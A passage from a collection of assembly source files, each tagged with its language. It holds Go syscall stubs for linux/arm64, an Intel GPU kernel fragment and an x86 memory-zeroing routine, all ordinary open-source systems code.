TEXT ·RawSyscall6(SB),NOSPLIT,$0-80
JMP syscall·RawSyscall6(SB)
| {
"language": "Assembly"
} |
/*
* Copyright (c) 2017, Intel Corporation
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included
* in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
* OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
* ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
* OTHER DEALINGS IN THE SOFTWARE.
*/
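// A best-effort note on the Gen ISA syntax below: "(8|M0)" gives the
// execution size and channel offset, "(W)" is the NoMask control, and
// "(f1.0)"/"(~f1.0)" predicate on a flag register; destination operands use
// a <HorzStride>:type region and sources a <VertStride;Width,HorzStride>:type
// region.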
L0:
mov (1|M0) r22.4<1>:ud 0x1000100:ud
mov (4|M0) acc0.0<1>:w 0x2406:v
add (4|M0) acc0.0<1>:w acc0.0<4;4,1>:w 0x40:uw
shl (4|M0) r22.0<1>:w acc0.0<4;4,1>:w 0x5:uw
(W&~f0.1)jmpi L800
L80:
mov (8|M0) r16.0<1>:ud r0.0<8;8,1>:ud
mov (8|M0) r17.0<1>:ud r25.0<8;8,1>:ud
mov (1|M0) r16.2<1>:ud 0xE000:ud
cmp (1|M0) (eq)f1.0 null.0<1>:w r24.2<0;1,0>:ub 0x1:uw
mov (16|M0) r66.0<1>:uw 0xFFFF:uw
mov (16|M0) r67.0<1>:uw 0xFFFF:uw
mov (16|M0) r74.0<1>:uw 0xFFFF:uw
mov (16|M0) r75.0<1>:uw 0xFFFF:uw
add (1|M0) a0.0<1>:ud r23.5<0;1,0>:ud 0x42EC100:ud
(~f1.0) mov (1|M0) r17.2<1>:f r10.2<0;1,0>:f
(~f1.0) mov (1|M0) r17.3<1>:f r10.7<0;1,0>:f
(f1.0) mov (1|M0) r17.2<1>:f r10.0<0;1,0>:f
(f1.0) mov (1|M0) r17.3<1>:f r10.7<0;1,0>:f
send (1|M0) r64:uw r16:ub 0x2 a0.0
(~f1.0) mov (1|M0) r17.2<1>:f r10.2<0;1,0>:f
(~f1.0) mov (1|M0) r17.3<1>:f r10.4<0;1,0>:f
(f1.0) mov (1|M0) r17.2<1>:f r10.0<0;1,0>:f
(f1.0) mov (1|M0) r17.3<1>:f r10.4<0;1,0>:f
send (1|M0) r72:uw r16:ub 0x2 a0.0
add (1|M0) a0.0<1>:ud r23.5<0;1,0>:ud 0x42EC201:ud
(~f1.0) mov (1|M0) r17.2<1>:f r10.2<0;1,0>:f
(~f1.0) mov (1|M0) r17.3<1>:f r10.7<0;1,0>:f
(f1.0) mov (1|M0) r17.2<1>:f r10.0<0;1,0>:f
(f1.0) mov (1|M0) r17.3<1>:f r10.7<0;1,0>:f
send (1|M0) r68:uw r16:ub 0x2 a0.0
(~f1.0) mov (1|M0) r17.2<1>:f r10.2<0;1,0>:f
(~f1.0) mov (1|M0) r17.3<1>:f r10.4<0;1,0>:f
(f1.0) mov (1|M0) r17.2<1>:f r10.0<0;1,0>:f
(f1.0) mov (1|M0) r17.3<1>:f r10.4<0;1,0>:f
send (1|M0) r76:uw r16:ub 0x2 a0.0
add (1|M0) a0.0<1>:ud r23.5<0;1,0>:ud 0x42EC302:ud
(~f1.0) mov (1|M0) r17.2<1>:f r10.2<0;1,0>:f
(~f1.0) mov (1|M0) r17.3<1>:f r10.7<0;1,0>:f
(f1.0) mov (1|M0) r17.2<1>:f r10.0<0;1,0>:f
(f1.0) mov (1|M0) r17.3<1>:f r10.7<0;1,0>:f
send (1|M0) r70:uw r16:ub 0x2 a0.0
(~f1.0) mov (1|M0) r17.2<1>:f r10.2<0;1,0>:f
(~f1.0) mov (1|M0) r17.3<1>:f r10.4<0;1,0>:f
(f1.0) mov (1|M0) r17.2<1>:f r10.0<0;1,0>:f
(f1.0) mov (1|M0) r17.3<1>:f r10.4<0;1,0>:f
send (1|M0) r78:uw r16:ub 0x2 a0.0
mov (1|M0) a0.8<1>:uw 0x800:uw
mov (1|M0) a0.9<1>:uw 0x880:uw
mov (1|M0) a0.10<1>:uw 0x8C0:uw
add (4|M0) a0.12<1>:uw a0.8<4;4,1>:uw 0x100:uw
L800:
nop
| {
"language": "Assembly"
} |
#------------------------------------------------------------------------------
#
# Copyright (c) 2006 - 2008, Intel Corporation. All rights reserved.<BR>
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php.
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
# Module Name:
#
# ZeroMem.S
#
# Abstract:
#
# ZeroMem function
#
# Notes:
#
#------------------------------------------------------------------------------
ASM_GLOBAL ASM_PFX(InternalMemZeroMem)
#------------------------------------------------------------------------------
# VOID *
# InternalMemZeroMem (
# IN VOID *Buffer,
# IN UINTN Count
# );
#------------------------------------------------------------------------------
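#
# Example (hypothetical C caller; the function returns Buffer):
#
#   UINT8  Buf[16];
#   VOID  *Ret = InternalMemZeroMem (Buf, sizeof (Buf));  // Ret == Buf
#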
ASM_PFX(InternalMemZeroMem):
    push    %edi
    xorl    %eax,%eax               # eax <- 0, the value to store
    movl    8(%esp),%edi            # edi <- Buffer
    movl    12(%esp),%ecx           # ecx <- Count
    movl    %ecx,%edx
    shrl    $2,%ecx                 # ecx <- number of whole dwords
    andl    $3,%edx                 # edx <- number of trailing bytes
    pushl   %edi                    # save Buffer for the return value
    rep
    stosl                           # zero Count/4 dwords
    movl    %edx,%ecx
    rep
    stosb                           # zero the remaining Count%4 bytes
    popl    %eax                    # eax <- Buffer
    pop     %edi
    ret
| {
"language": "Assembly"
} |
// Copyright 2015 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build linux
// +build arm64
// +build !gccgo
#include "textflag.h"
// Just jump to package syscall's implementation for all these functions.
// The runtime may know about them.
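// The *NoError variants below are open-coded rather than forwarded: they are
// meant for syscalls that cannot fail, so no errno is recovered after the
// SVC. SyscallNoError additionally brackets the call with
// runtime·entersyscall/runtime·exitsyscall so the scheduler knows the
// goroutine is blocked in a syscall; RawSyscallNoError skips that.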
TEXT ·Syscall(SB),NOSPLIT,$0-56
B syscall·Syscall(SB)
TEXT ·Syscall6(SB),NOSPLIT,$0-80
B syscall·Syscall6(SB)
TEXT ·SyscallNoError(SB),NOSPLIT,$0-48
BL runtime·entersyscall(SB)
MOVD a1+8(FP), R0
MOVD a2+16(FP), R1
MOVD a3+24(FP), R2
MOVD $0, R3
MOVD $0, R4
MOVD $0, R5
MOVD trap+0(FP), R8 // syscall entry
SVC
MOVD R0, r1+32(FP) // r1
MOVD R1, r2+40(FP) // r2
BL runtime·exitsyscall(SB)
RET
TEXT ·RawSyscall(SB),NOSPLIT,$0-56
B syscall·RawSyscall(SB)
TEXT ·RawSyscall6(SB),NOSPLIT,$0-80
B syscall·RawSyscall6(SB)
TEXT ·RawSyscallNoError(SB),NOSPLIT,$0-48
MOVD a1+8(FP), R0
MOVD a2+16(FP), R1
MOVD a3+24(FP), R2
MOVD $0, R3
MOVD $0, R4
MOVD $0, R5
MOVD trap+0(FP), R8 // syscall entry
SVC
MOVD R0, r1+32(FP)
MOVD R1, r2+40(FP)
RET
| {
"language": "Assembly"
} |